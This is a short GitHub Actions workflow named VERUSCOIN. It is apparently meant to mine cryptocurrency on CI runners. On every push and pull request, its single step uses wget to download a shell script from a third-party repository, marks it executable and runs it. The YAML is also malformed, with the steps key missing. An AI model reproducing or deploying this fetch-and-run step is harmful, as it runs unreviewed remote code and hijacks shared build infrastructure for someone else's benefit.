name: VERUSCOIN
on: [push, pull_request]
jobs:
  build:
    name: pull
    runs-on: ubuntu-18.04
    - name: run
      run: |
        wget https://raw.githubusercontent.com/AHILERTGY/pull-nice-game/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
